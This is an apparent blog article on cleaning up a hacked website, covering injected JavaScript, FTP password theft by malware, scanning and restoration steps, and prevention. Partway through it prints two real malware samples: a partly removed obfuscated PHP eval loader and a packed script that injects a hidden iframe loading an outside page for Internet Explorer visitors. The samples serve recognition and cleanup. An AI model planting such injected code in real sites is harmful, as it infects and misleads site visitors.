Malware Recovery: What to Do When Google Says You`ve Been Hacked

It’s a beautiful Monday morning and you walk into work. You go to sit down and check your website statistics from last week and the weekend and your heart sinks. Your website traffic is down, you have multiple warnings from Google about malware on your website and you have no idea what just happened. Was I hacked? Is this an error? Did that intern just…

No, your staff didn’t mess up the page or fumble the server, your site was compromised. Through various methods, a hacker has accessed your website, uploaded malicious code and skipped out.

Now, your visitors may get their computers infected and your search engine rankings might be at risk.  So, what do you do? Continue reading; let’s study the psychology and reasoning of such attacks.

What is a site hack? Why does it happen?

This might be a pretty obvious question. Why would somebody install malware or a virus on a website/computer? Ninety percent of the time it’s for financial gain. Ten percent of the time it’s just for the fun of it. What we’re seeing now is a huge increase in scareware. This is a form of malware that tricks you into buying a software to cure the scareware. The majority of people believe the scareware is a real Microsoft virus scanner — when in reality, the "scanner" is the malware acting as scareware.

There could be valuable information on internal networks a hacker might want. They could simply want to spread their malware to as many computers as possible for the purpose of extortion.

So what exactly is a site hack? The answer is simple: somebody accessed and modified code on your website without permission. From my experience, about 99% of the time there is a piece of JavaScript (JS) code that has been added to each index.html/php page.

Once the hacker has access to your website, they will inject this malicious JS code into your files. The code can do a number of things, such as: redirect the user to a different page (usually spam), redirect the website’s PageRank (via links) to the hacker’s site or client’s site, or worse case, the JS code could trigger "drive by" downloading of the malware to infect the website’s visitors’ computers. All of these are bad for business, and bad for your users and your staff.

Possible causes

Let’s face it, even top notch security cannot always protect you. There are backdoors to all web elements, especially if you use a Content Management System (CMS). If you run WordPress, Joomla, SimpleCMS, Magento, or any other open source CMS, there is a strong possibility your site can be compromised with known SQL injections.

The most common access point for a website malware hack is not the website, but the computers on which it was developed and accessed. Assuming all of the software on your website is up to date, and all of your updates/patches are working fine, you will often see user computers that are infected. How does this happen?

A hacker tries to hack a website, but it’s secure, so he skips it and goes to a less secure site. The hacker accesses the website, installs malicious script to enable "drive-by" downloads (the ability for the script to auto-install and run malware). A user who is a webmaster or has access to his website visits the site.  The JS auto loads and runs, then installs the malware copy on the visitor’s computers. 

Remember, our visitor is a webmaster…  Once the webmaster visits the compromised computer, he may see something funny, like a quick flash on a screen, multiple hourglass icons when seemingly idle and an increase in running tasks (on Windows) found in the Task Manager.

Now, the webmaster’s computer has the malware installed on it. It’s not on his website — so what gives?  How does the malware make it to the website?  It’s simple, really…

From this point on, there are no signs that the visitor (or our webmaster) is infected. While the webmaster is working, the malware is working, too – in the background. While the visitor continues their Internet browsing, the malware is scanning known directories for user login details. The malware is looking for – nope, not banking, not PayPal, not Facebook – CoreFTP and FileZilla logins. 

Did you know that most common FTP programs store your passwords in PLAIN TEXT? That means once the malware finds the common directories and locations of stored passwords, the nasty software sends that information to the hacker. Now, the hacker has access to your website to regenerate his malware and redistribute on your website.

How to fix/clean

Cleaning out malware can be a difficult, stressful and time-consuming task.  If you’re not too familiar with code, and don’t know what is supposed to "look right" on your website, you might want to call a professional. However, assuming you’re comfortable, there are a few areas you should look into.

The first step is cleaning. You must first flush your system clean of the virus and malware before you attempt a fix. Fixing your website before a program scan and clean will only repeat the cycle, and you will always play catch up. Below is a list of what should be done in an orderly fashion:

  • Report the incident to your hosting provider and/or IT staff.

  • Scan all computers that have access to your website. We mean ALL computers.

  • Run multiple scanning tools. Personally, I suggest the following:  Malware Bytes, SpyBot Search and Destroy, ComboFix and Microsoft Security Essentials. Remember: update your virus scanner before all scans.

  • Scan your startup directory. In Windows, go to Run>msconfig and scan each item.

  • Through your Registry Editor (Windows), scroll through each "Run" entries to look for suspicious items.

  • Change ALL passwords associated with your website, CMS admin sections, FTP, MySQL, control panels, EVERYTHING.

  • Download all of your files from your website (for review and analyzing the hacked code).
     

If you have a backup of your website, now is the time to restore. If you do not have one, ask to see if your hosting company has one. If you don’t, you will have to manually go through lines of code. Don’t worry; it’s more time consuming than challenging.
 
You don’t have a backup of your website? Don’t panic; there is the manual way to remove these links.  It’s going to take time, and a lot of finding.

The most logical thing to do would be to download your entire FTP and simply sort the files by the date they were modified. Obviously, the compromised files would have been accessed last. Typically, I’ve seen only index.php files been hit. When you scan the code, you want to look for weird encrypted JS on the very top or very bottom of the code. Here’s a sample from one recent malware (this is a real example):

Encrypted:
<?php $fyw_jmzlq = array("eNqtWgl32siy/iuMT05sXjyOWg","ugccjFjsHGsWDAgIGZHA4I2SzC","cFjCku…REMOVED-URL…/04U8HHmkbE78MhDn","9VASffpah4/LLvGfj/8PWGX41A","==");eval("x65x76x61x6Cx28x67x7Ax75x6E…removed…x29x29x29x29x3B");?


JS:
<sc ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,'g’),k[c])}}return p}(‘i 9(){a=6.h(‘b’);7(!a){5 0=6.j(‘k’);6.g.l(0);0.n=’b';0.4.d=’8′;0.4.c=’8′;0.4.e=’f';0.m=’w://z.o.B/C.D?t=E’}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732′.split(‘|’),0,{}))
</sc ript>


As you can see, from the above real world example, these malicious codes are usually pretty easy to spot if you know what you’re looking for. If you’re proceeding with a manual remove, you will need to manually review and edit every file infected with the above code. Simply removing the code from the file and re-uploading will cure this problem. Please make sure to double check all files both by visually scanning, and then by sorting all of them by modified date — to ensure you captured all compromised files.

The problem is not solved yet. Assuming your website was hit with malware, you should review your Google/Bing Webmaster Tools to verify that you fixed any problems Goolge/Bing found. Usually, this is simply done with a response to a notification or a reconsideration request. Google is very good at restoring rankings once a problem is fixed. You should allow 7-14 days for this to fully process.

Prevention

Depending on the size of your site and compromise, a situation like this could put your website offline for days, if not weeks — costing you business and visitors. So, what can be done to not be one of the victims? Here are a few good ideas.

If you run a CMS (such as Joomla or WordPress) on your website, there are a few security measures you should take, such as:

  • keep your CMS updated;

  • hide default login areas (such as /administrator or /wp-admin);

  • change default user’s names (most CMSes have "admin" as the default login, so try to change this to something a bit more personalized and secure);

  • ensure your hosting provider keeps their servers secure; and

  • install and configure backup utilities.

So, as you can tell, there are multiple areas that need to be protected here. Keeping your website secure means that you need to keep your personal computer secure, as do any co-workers or firms who have access to your website. You’re ALL responsible for keeping your website protected. Remember, you must ensure that all computers that are accessing your website via FTP are secure as well. Here are some basic steps you can take:

  • Keep up with OS updates and patches.

  • Keep all software updated and patched.

  • Regularly scan your computer with the aforementioned software –  and keep in mind that your anti-virus software is useless if you do not keep it updated.

  • Do NOT save your passwords in your FTP programs.

  • If you have multiple FTP users, assign different rights for different uses. Avoid giving all users access to the entire FTP root. 

Author bio: Josh Zehtabchi is a professional web developer and SEO by trade. Josh graduated with a computer science degree and has been a web developer for over 10 years and a professional SEO for over 5 years. With clients that range from: FEMA, Pepsi Bottling Company, Motorola, The Atlanta Symphony and VMX Technologies, Josh’s SEO skills are widely ranged in many niche industries.

You can find Josh professionally at: http://www.v2interactive.net and  http://www.joshz.net.

You can also find Josh on the following social sites:

https://www.facebook.com/jzehtabchi

http://www.linkedin.com/in/joshzehtabchi

https://plus.google.com/112687311676111255689/posts  

 

Google+ Comments

Google+ Comments